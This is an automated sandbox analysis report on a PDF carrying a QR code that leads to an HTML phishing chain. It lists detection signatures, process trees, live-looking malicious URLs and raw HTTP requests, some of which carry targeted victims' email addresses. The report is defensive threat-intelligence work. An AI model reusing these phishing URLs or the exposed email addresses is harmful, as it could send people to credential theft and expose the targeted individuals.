Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
virus.pdf

Overview

General Information

Sample name:virus.pdf
Analysis ID:1641117
MD5:21fc9a2a54d0f2d6d678fc7d18b59822
SHA1:de0059b6c1d8f219e6a865cf93dfde46372162fd
SHA256:558ec0ecee68675ee63a5b1efc37724f76b4653e831510e1fd3fa4c598c92a4b
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish45
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • Acrobat.exe (PID: 6264 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\virus.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 6440 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6632 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1604 --field-trial-handle=1568,i,7923655495327458657,17984682865062963080,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVz MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1960,i,13355097746480612969,17419181852337752689,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2084 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_166JoeSecurity_HtmlPhish_45Yara detected HtmlPhish_45Joe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    • AV Detection
    • Phishing
    • Compliance
    • Software Vulnerabilities
    • Networking
    • System Summary
    • Hooking and other Techniques for Hiding and Protection
    • Malware Analysis System Evasion

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN?S=bjones@lakeland.cc.il.usAvira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAvira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/fd9d1056-4f5113e8da6db9c7.jsAvira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/webpack-20efd41c90b5bcbd.jsAvira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/media/a34f9d1faa5f3315.p.woff2Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/not-found-9fcb5dc5d913bcdb.jsAvira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/23-e33e3d623cf28c17.jsAvira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/7b64cd318fb77179.cssAvira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/main-app-653c0408c14c4864.jsAvira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=bjones@lakeland.cc.il.usAvira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/page-c71772bf3bad0174.jsAvira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/92-2a0dad65b64d730c.jsAvira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/f796ea3b426fcf90.cssAvira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=jjohns@lakeland.cc.il.usAvira URL Cloud: Label: malware

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_166, type: DROPPED
    Source: PDF documentJoe Sandbox AI: PDF document contains QR code
    Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/lo... This script demonstrates several high-risk behaviors, including the use of dynamic code execution (via `decodeEmail` function), data exfiltration (sending the decoded email to an untrusted domain), and the use of an obfuscated URL. The combination of these factors, along with the suspicious redirect to an unknown domain, indicates a high likelihood of malicious intent.
    Source: unknownHTTPS traffic detected: 192.185.25.215:443 -> 192.168.2.16:49697 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.25.215:443 -> 192.168.2.16:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.25.215:443 -> 192.168.2.16:49702 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.25.215:443 -> 192.168.2.16:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.185.196:443 -> 192.168.2.16:49722 version: TLS 1.2
    Source: chrome.exeMemory has grown: Private usage: 17MB later: 37MB
    Source: global trafficTCP traffic: 192.168.2.16:49740 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:49740 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:49740 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:49740 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:49740 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:49740 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:49740 -> 1.1.1.1:53
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
    Source: global trafficHTTP traffic detected: GET /awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVz HTTP/1.1Host: khfreightgroup.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVz HTTP/1.1Host: khfreightgroup.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVzAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: khfreightgroup.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVzAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/05/cropped-KH-Freight-Icon-32x32.png HTTP/1.1Host: khfreightgroup.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVzAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/05/cropped-KH-Freight-Icon-32x32.png HTTP/1.1Host: khfreightgroup.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /lq3uzfH9rN?S=bjones@lakeland.cc.il.us HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://khfreightgroup.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /lq3uzfH9rN/?S=bjones%40lakeland.cc.il.us HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://khfreightgroup.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/css/7b64cd318fb77179.css HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/media/a34f9d1faa5f3315.p.woff2 HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-aliveOrigin: https://sdspprfd-tftfrtrghf34f3drrs3.netsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-20efd41c90b5bcbd.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/fd9d1056-4f5113e8da6db9c7.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/23-e33e3d623cf28c17.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-app-653c0408c14c4864.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/app/not-found-9fcb5dc5d913bcdb.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: x1.i.lencr.org
    Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
    Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
    Source: global trafficHTTP traffic detected: GET /?S=bjones@lakeland.cc.il.us HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/css/f796ea3b426fcf90.css HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=bjones@lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/92-2a0dad65b64d730c.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=bjones@lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/app/page-c71772bf3bad0174.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=bjones@lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?S=jjohns@lakeland.cc.il.us HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: khfreightgroup.com
    Source: global trafficDNS traffic detected: DNS query: sdspprfd-tftfrtrghf34f3drrs3.net
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
    Source: unknownHTTP traffic detected: POST /report/v4?s=Kka7siyfKKzh0DHyAAs5LLTT2aN7pS%2Bqrfw55tzojkxRCne0dyUrgcHj8QX6HpmOaB4%2FywnN39pt%2FyFZv335nnPj7C%2Fg3qvccqv3frvp99GFev5vl%2FNF0TpkY1svgF06d8Subml9hCqNAuueHB0E53zEzw%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 467Content-Type: application/reports+jsonOrigin: https://sdspprfd-tftfrtrghf34f3drrs3.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 01:17:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, max-age=0, must-revalidatevary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Accept-Encodinglink: </_next/static/media/a34f9d1faa5f3315.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2"x-powered-by: Next.jscf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kka7siyfKKzh0DHyAAs5LLTT2aN7pS%2Bqrfw55tzojkxRCne0dyUrgcHj8QX6HpmOaB4%2FywnN39pt%2FyFZv335nnPj7C%2Fg3qvccqv3frvp99GFev5vl%2FNF0TpkY1svgF06d8Subml9hCqNAuueHB0E53zEzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9220e4903c29440e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2691&min_rtt=1705&rtt_var=1343&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3096&recv_bytes=1318&delivery_rate=2568914&cwnd=216&unsent_bytes=0&cid=ec09375f3d8c0594&ts=759&x=0"
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
